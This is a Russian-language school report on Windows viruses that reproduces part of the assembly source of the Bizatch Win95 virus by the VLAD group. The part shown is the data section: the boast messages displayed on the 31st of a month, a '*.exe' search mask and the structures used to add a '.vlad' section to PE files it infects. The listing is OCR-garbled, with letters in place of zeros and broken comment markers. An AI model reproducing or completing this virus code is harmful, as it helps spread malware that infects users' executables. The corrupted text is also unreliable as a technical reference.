Доклад: Вирусы под Windows

resv dd 0,0

fullname db 256 dup (0)

realname db 256 dup (0)

;Имя сообщения, выводимого 31-го числа
boxtitle db "Bizatch by Quantum / VLAD",0

.-Сообщение, выводимое 31-го числа
boxmsg db "The taste of fame just got tastier!",Odh

db "VLAD Australia does it again with the world"s first Win95 Virus"

db Odh.Odh

db 9."From the old school to the new. ".Odh.Odh

db 9,"Metabolis",Odh

db 9,"Qark",Odh

db 9,"Darkman",Odh

db 9,"Quantum",Odh

db 9,"CoKe",0
messagetostupidavers db "Please note: the name of this virus is [Bizatch]"

db "written by Quantum of VLAD",0

Данные о директориях
orgdir db 256 dup (0)
tempdir db 256 dup (0)
tempdirl db 256 dup (0)

Используется для смены директории
dotdot db ".",0

Используется для получения времени/даты
systimestruct:

dw 0,0,0
day dw 0

dw 0,0,0,0

;Индекс для поиска файлов
searchhandle dd О

;Маска для поиска
fname db "*.exe",0

; Описатель открытого файла
ahand dd О

;Смещение РЕ-заголовка в файле
peheaderoffset dd О

[Смещение таблицы объектов
ObjectTableoffset dd О

[Количество записанных/считанных байт при работе с файлом
bytesread dd О

.Новый объект
newobject:

oname db ".vlad",0,0,0
virtualsize dd 0
RVA dd 0

physicalsize dd 0
physicaloffset dd 0
reserved dd 0,0,0
objectflags db 40h,0,0,OCOh

Данные, необходимые для заражения файла
peheader: